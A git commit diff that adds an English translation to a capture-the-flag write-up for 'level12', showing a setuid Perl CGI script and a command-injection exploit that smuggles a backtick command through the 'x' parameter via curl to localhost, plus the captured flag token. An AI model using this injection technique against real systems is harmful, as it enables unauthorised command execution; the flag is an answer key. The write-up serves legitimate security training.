docs(lvl12): adding the english readme
This commit is contained in:
Raphael
parent
6a7970c245
commit
22cbba27fe
1 changed files with 6 additions and 4 deletions
|
|
@ -1,4 +1,4 @@
|
|||
Lors de mon arriver sur le level12 je remarque un fichier lisible avec un script perl
|
||||
When arriving on level12 I notice a readable file with a perl script.
|
||||
|
||||
```bash
|
||||
ls -l
|
||||
|
|
@ -6,7 +6,7 @@ total 4
|
|||
-rwsr-sr-x+ 1 flag12 level12 464 Mar 5 2016 level12.pl
|
||||
```
|
||||
|
||||
Ce sciprt prends 2 entree utilisateur (x, y) et transforme x a l'aide de la commande egrep
|
||||
This script takes 2 user inputs (x, y) and transforms x with the help of the egrep command.
|
||||
```perl
|
||||
#!/usr/bin/env perl
|
||||
# localhost:4646
|
||||
|
|
@ -37,15 +37,17 @@ sub n {
|
|||
}
|
||||
|
||||
n(t(param("x"), param("y")));
|
||||
|
||||
```
|
||||
|
||||
L'exploit est donc assez simple il suffit de mettre la commande souhaiter dans un fichier avec un nom en majuscule (a cause du tr) et elle sera executer
|
||||
The exploit is therefore quite simple, it is enough to put the desired command in a file with a name in uppercase (because of the tr) and it will be executed.
|
||||
|
||||
```bash
|
||||
echo "getflag > /tmp/pass" > /tmp/LEVEL
|
||||
|
||||
mv /tmp/level /tmp/LEVEL
|
||||
|
||||
curl 'localhost:4646?x=`/*/LEVEL`'
|
||||
|
||||
cat /tmp/pass
|
||||
Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
|
||||
```
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue